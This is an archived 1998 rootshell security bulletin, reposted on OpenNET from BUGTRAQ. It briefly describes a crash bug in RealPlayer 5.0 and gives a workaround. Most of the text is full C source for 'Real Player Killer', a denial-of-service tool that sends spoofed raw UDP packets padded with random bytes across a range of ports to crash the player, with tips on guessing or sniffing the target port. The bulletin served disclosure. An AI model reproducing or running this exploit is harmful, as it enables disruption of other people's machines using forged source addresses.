The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Хинт: Доступна новая система навигации "Дерево ключевых слов" - поиск нужного материала во всех разделах сайта на одной странице.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

[rootshell] Security Bulletin #20


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Mon, 6 Jul 1998 17:16:39 -0500
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: [rootshell] Security Bulletin #20

Date: 6 Jul 1998 15:31:00 -0000
From: announce-outgoing@rootshell.com
Cc: recipient list not shown:  ;
Subject: [rootshell] Security Bulletin #20


www.rootshell.com
Security Bulletin #20
July 6th, 1998

[ http://www.rootshell.com/ ]

----------------------------------------------------------------------

To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com
with "unsubscribe announce" in the BODY of the message.

Send submissions to info@rootshell.com.  Messages sent will not be sent to
other members on this list unless it is featured in a security bulletin.

An archive of this list is available at :
http://www.rootshell.com/mailinglist-archive

----------------------------------------------------------------------

01. Real Player 5.0 Killer
--------------------------

Real Networks has been notified of the problem and has stated that they will
make a fix for their upcoming G2 release and are considering making a patch
available for all of the 5.0 players out there.  The only available
workaround at this time is to force your player to use TCP instead of UDP
for streams in the transport area of the preferences menu.

/*
 * Real Player Killer - 6/26/98
 *
 * (C) 1998 Kit Knox <kit@connectnet.com>
 *
 * [ http://www.rootshell.com/ ]
 *
 * Real Player 5.0 for Windows95 and Linux (others untested) do not check
 * the validity of incoming UDP packets used when receiving audio/video.
 *
 * If you are able to determine or brute force the destination port of the
 * stream you are able to crash the player and cause it to use 100% of
 * idle CPU.  I would not be surprised if there are numerous buffer
 * overflows in this area as well.  The client does not even check if the
 * source IP address is the one it is receiving data from.  Any source IP
 * can be used.
 *
 * Generally the stack will start with port 1025 and go up.  Starting there
 * and going up will generally give you good results.  If you are able to
 * sniff the network you will know the exact port and not have to guess.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>

#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

char real_data[] =
  { 0x00, 0x00 };


unsigned short
in_cksum (addr, len)
     u_short *addr;
     int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }

  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

int
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
     struct sockaddr_in *sin;
     unsigned short int s, datalen, sport, dport;
     unsigned long int saddr, daddr;
     char *data;
{
  struct iphdr ip;
  struct udphdr udp;
  static char packet[8192];
  char crashme[500];
  int i;

  ip.ihl = 5;
  ip.version = 4;
  ip.tos = rand () % 100;;
  ip.tot_len = htons (28 + datalen);
  ip.id = htons (31337 + (rand () % 100));
  ip.frag_off = 0;
  ip.ttl = 255;
  ip.protocol = IPPROTO_UDP;
  ip.check = 0;
  ip.saddr = saddr;
  ip.daddr = daddr;
  ip.check = in_cksum ((char *) &ip, sizeof (ip));
  udp.source = htons (sport);
  udp.dest = htons (dport);
  udp.len = htons (8 + datalen);
  udp.check = (short) 0;
  memcpy (packet, (char *) &ip, sizeof (ip));
  memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
  memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
  for (i = 0; i < 500; i++)
    crashme[i] = rand () % 255;
  memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
  return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
                  (struct sockaddr *) sin, sizeof (struct sockaddr_in)));
}

unsigned int
lookup (host)
     char *host;
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr (host);
  if (addr == -1)
    {
      he = gethostbyname (host);
      if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
        return 0;

      bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
    }
  return (addr);
}

void
main (argc, argv)
     int argc;
     char **argv;
{
  unsigned int saddr, daddr;
  struct sockaddr_in sin;
  int s, i;

  if (argc != 5)
    errs ("Usage: %s <source_addr> <dest_addr> <low port> <high port>\n", argv[0]);

  printf("Real Player Killer - http://www.rootshell.com/\n\n");
  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err ("Unable to open raw socket.\n");
  if (!(saddr = lookup (argv[1])))
    err ("Unable to lookup source address.\n");
  if (!(daddr = lookup (argv[2])))
    err ("Unable to lookup destination address.\n");
  sin.sin_family = AF_INET;
  sin.sin_port = 9;
  sin.sin_addr.s_addr = daddr;
  for (i=atoi(argv[3]); i<atoi(argv[4]); i++)
  if ((sendpkt_udp (&sin, s, &real_data, sizeof (real_data), saddr, daddr, 2014, i)) == -1)
    {
      perror ("sendpkt_udp");
      err ("Error sending the UDP packet.\n");
    }
  printf("Done!\n");
}

----------------------------------------------------------------------

To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com
with "unsubscribe announce" in the BODY of the message.

Send submissions to info@rootshell.com.  Messages sent will not be sent to
other members on this list unless it is featured in a security bulletin.

An archive of this list is available at :
http://www.rootshell.com/mailinglist-archive

----------------------------------------------------------------------

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network.
RB2 Network.